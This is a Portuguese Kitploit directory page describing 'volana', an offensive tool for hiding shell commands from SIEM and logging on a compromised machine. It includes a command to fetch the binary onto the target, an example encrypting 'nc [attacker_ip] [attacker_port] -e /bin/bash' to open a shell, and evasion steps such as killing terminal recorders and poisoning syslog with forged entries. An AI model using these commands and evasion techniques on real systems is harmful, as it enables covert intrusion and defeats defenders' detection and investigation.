Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
volana — 🌒 Ofuscação de comandos shell para evitar sistemas de detecção | Kitploit
Ferramentas/GitHubGitHub/ariary/volana
ExploraçãoEvasão de IDS/IPSShellcodeTestes de PenetraçãoComando e ControleRed Teaming
GitHubariary/volana

volana

🌒 Ofuscação de comandos shell para evitar sistemas de detecção

Ver Repositório
12097há 3 anosRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

volana (lua em malgaxe)

root@kitploit:~
{ Usar ; 🌚(esconder de); 🌞(detectado por) } 

Ofuscação de comandos de shell para evitar SIEM/sistema de detecção

Durante um pentest, um aspecto importante é ser furtivo. Por esta razão, você deve . No entanto, muitas infraestruturas registram comandos e os enviam para um SIEM em tempo real, tornando a limpeza posterior inútil. fornece uma maneira simples de esconder comandos executados na máquina comprometida, fornecendo seu próprio runtime de shell (digite seu comando, volana executa por você). Dessa forma, você

limpar seus rastros após sua passagem


volana
limpa seus rastros DURANTE sua passagem

Uso

Você precisa obter um shell interativo. (Encontre uma maneira de gerá-lo, você é um hacker, é seu trabalho! caso contrário). Em seguida, faça o download na máquina alvo e execute. É isso, agora você pode digitar o comando que deseja executar furtivamente

root@kitploit:~
## Download it from github release
## If you do not have internet access from compromised machine, find another way
curl -lO -L https://github.com/ariary/volana/releases/latest/download/volana

## Execute it
./volana

## You are now under the radar
volana » echo "Hi SIEM team! Do you find me?" > /dev/null 2>&1  #you are allowed to be a bit cocky
volana » [command]

Palavras-chave para o console volana:

  • ring: ativar modo anel, ou seja, cada comando é lançado com vários outros para encobrir rastros (de soluções que monitoram chamadas de sistema)
  • exit: sair do console volana

a partir de shell não interativo

Imagine que você tenha um shell não interativo (webshell ou rce cega). Você pode usar os subcomandos encrypt e decrypt. Anteriormente, você precisa compilar volana com uma chave de criptografia embutida.

Na máquina do atacante

root@kitploit:~
## Build volana with encryption key
make build.volana-with-encryption

## Transfer it on TARGET (the unique detectable command)
## [...]

## Encrypt the command you want to stealthy execute
## (Here a nc bindshell to obtain a interactive shell)
volana encr "nc [attacker_ip] [attacker_port] -e /bin/bash"
>>> ENCRYPTED COMMAND

Copie o comando criptografado e execute-o com seu rce na máquina alvo

root@kitploit:~
./volana decr [encrypted_command]
## Now you have a bindshell, spawn it to make it interactive and use volana usually to be stealth (./volana). + Don't forget to remove volana binary before leaving (cause decryption key can easily be retrieved from it)

Por que não esconder o comando com echo [command] | base64? E decodificar no alvo com echo [encoded_command] | base64 -d | bash

Porque queremos estar protegidos contra sistemas que disparam alertas para o uso de base64 ou que procuram texto base64 no comando. Além disso, queremos dificultar a investigação e o base64 não é uma barreira real.

Detecção

Tenha em mente que volana não é um milagre que o tornará totalmente invisível. Seu objetivo é tornar a detecção de intrusão e a investigação mais difíceis.

Esconder de

Apenas a linha de comando de inicialização do volana será capturada. 🧠 No entanto, adicionando um espaço antes de executá-lo, o comportamento padrão do bash é não salvá-lo

  • Sistemas de detecção baseados na saída do comando history
  • Sistemas de detecção baseados em arquivos de histórico
    • .bash_history, ".zsh_history" etc ..
  • Sistemas de detecção baseados em bash debug traps
  • Sistemas de detecção baseados no sistema de registro interno do sudo
  • Sistemas de detecção que rastreiam todas as chamadas de sistema de processos em todo o sistema (ex: opensnoop)
  • Gravador de terminal (tty) (script, screen -L, sexonthebash, ovh-ttyrec, etc..)
    • Fácil de detectar e evitar: pkill -9 script
    • Não é um caso comum
    • screen é um pouco mais difícil de evitar, no entanto, ele não registra a entrada (entrada secreta: stty -echo => evitar)
    • A detecção de comandos pode ser evitada com volana com criptografia

Visível para

  • Sistemas de detecção que possuem alerta para comando desconhecido (o do volana)
  • Sistemas de detecção baseados em keylogger
    • Fácil de evitar: copiar/colar comandos
    • Não é um caso comum
  • Sistemas de detecção baseados em arquivos syslog (ex: /var/log/auth.log)
    • Apenas para comandos sudo ou su
    • O arquivo syslog pode ser modificado e assim envenenado como desejar (ex: para /var/log/auth.log:logger -p auth.info "No hacker is poisoning your syslog solution, don't worry")
  • Sistemas de detecção baseados em syscall (ex: auditd, LKML/eBPF)
    • Difícil de analisar, pode ser tornado ilegível fazendo várias chamadas de sistema de diversão
  • Injeção personalizada de LD_PRELOAD para registrar
    • Não é um caso comum de forma alguma

Bug bounty

Desculpe pelo título clickbait, mas nenhum dinheiro será fornecido para contribuidores. 🐛

Informe-me se você encontrou:

  • uma maneira de detectar volana
  • uma maneira de espionar o console que não detecta comandos volana
  • uma maneira de evitar um sistema de detecção

Relate aqui

Crédito

  • 8 maneiras de espionar o console
  • moonwalk: ferramenta similar que limpa rastros APÓS a passagem
Baixar ferramenta